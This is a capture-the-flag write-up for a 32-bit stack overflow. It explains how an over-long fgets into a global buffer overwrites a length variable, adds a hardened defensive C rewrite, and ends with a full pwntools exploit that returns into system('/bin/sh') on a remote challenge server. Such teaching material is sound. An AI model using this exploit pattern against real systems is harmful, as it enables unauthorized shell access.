This challenge is a 32-bit stack overflow.
fgets() is a safe function and is hard to overflow on its own.
```c
int message()
{
    char s; // [esp+18h] [ebp-30h]   stack buffer, 0x30 below the saved ebp
    n = 10;                          // A and n are globals in .bss (see below)
    puts("you can leave some message here:");
    fgets(A, 60, stdin);             // reads up to 59 bytes into the 40-byte A
    puts("your name please:");
    fgets(&s, n, stdin);             // length comes from the global n
    return puts("Thank you");
}
```
This is the vulnerable function: we need to overwrite n in order to set up the stack overflow in the next step.
First, note that A lives in the .bss segment:
```
.bss:0804A064 ; __do_global_dtors_aux+14↑w
.bss:0804A065 align 20h
.bss:0804A080 public A
.bss:0804A080 ; char A[40]
.bss:0804A080 A db 28h dup(?) ; DATA XREF: message+2D↑o
.bss:0804A0A8 ; int n
.bss:0804A0A8 n dd ? ; DATA XREF: message+6↑w
.bss:0804A0A8 ; message+4B↑r
.bss:0804A0AC align 20h
.bss:0804A0C0 public choice
.bss:0804A0C0 ; char choice
.bss:0804A0C0 choice d
```
Since A is a char array and n sits exactly 40 bytes after A's .bss address, while fgets(A, 60, stdin) accepts up to 59 bytes, we can overwrite n and then cause the stack overflow.
The backdoor function is also provided; it just lacks a "/bin/sh" string, so we supply that ourselves. Straight to the exp:
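As an added defensive illustration (not the challenge binary's code), here is a hardened message() in which the first read is bounded by sizeof A and n is range-checked before it is used as a length, so the 40-byte boundary between A and n can no longer be crossed; the 16-byte name buffer and the temp-file driver are assumptions made for this example.

```c
#include <stdio.h>
#include <string.h>

/* Same layout as the challenge: a 40-byte global followed by the length n (constructed example). */
static char A[40];
static int n;

/* Consume the rest of an over-long line so it cannot be misread as the next field. */
static void drain_line(FILE *in, const char *buf)
{
    int c;
    if (strchr(buf, '\n') == NULL)
        while ((c = fgetc(in)) != EOF && c != '\n') ;
}

/* Hardened message(): the read is bounded by sizeof A, so a long line truncates instead of
   running into n, and n is range-checked before it is passed to the second fgets. */
int message_hardened(FILE *in)
{
    char s[16];                        /* assumption: 16-byte name buffer */
    n = 10;
    if (fgets(A, sizeof A, in) == NULL)
        return -1;
    drain_line(in, A);
    if (n < 1 || (size_t)n > sizeof s) /* only fails if n were somehow corrupted */
        return -2;
    if (fgets(s, n, in) == NULL)
        return -1;
    return n;
}

/* Drive message_hardened() from a memory buffer (via tmpfile) and return the surviving n. */
int n_after_run(const char *input, size_t len)
{
    FILE *in = tmpfile();
    int rc = -1;
    if (in == NULL)
        return rc;
    fwrite(input, 1, len, in);
    rewind(in);
    rc = message_hardened(in);
    fclose(in);
    return rc < 0 ? rc : n;
}

/* Constructed sample with the writeup's first-line shape: 40 filler bytes, a 4-byte
   little-endian 80, "/bin/sh", then a short name on the next line. */
int run_constructed_sample(void)
{
    static const char sample[] = "aaaaaaaaaa" "aaaaaaaaaa" "aaaaaaaaaa" "aaaaaaaaaa"
                                 "\x50" "\0\0\0" "/bin/sh\n" "bob\n";
    return n_after_run(sample, sizeof sample - 1);
}
```

With the original fgets(A, 60, stdin) this same input would set n to 80; here A holds only the first 39 bytes and n stays 10.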
```python
from pwn import *

p = remote('182.254.217.142', 10001)
# p = process('../cgpwna')
elf = ELF('../cgpwna')

bss_addr = 0x0804A080      # address of A in .bss
system_addr = 0x080483F0   # the backdoor call to system
offset = 0x30 + 0x4        # s is at ebp-0x30; +4 for the saved ebp

# First input: fill A (40 bytes), overwrite n with 80, then place "/bin/sh" at A+44
payload = b'a' * 40
payload += p32(80)
payload += b"/bin/sh"

p.recvuntil(b'your choice:')
p.sendline(b'1')
p.recvuntil(b'you can leave some message here:')
p.sendline(payload)
p.recvuntil(b'your name please:')

# Second input: now fgets(&s, 80, stdin) overflows; return into system("/bin/sh")
payload2 = b'a' * offset + p32(system_addr) + b"aaaa" + p32(bss_addr + 44)
p.sendline(payload2)
p.interactive()
```
~~pwn is so hard~~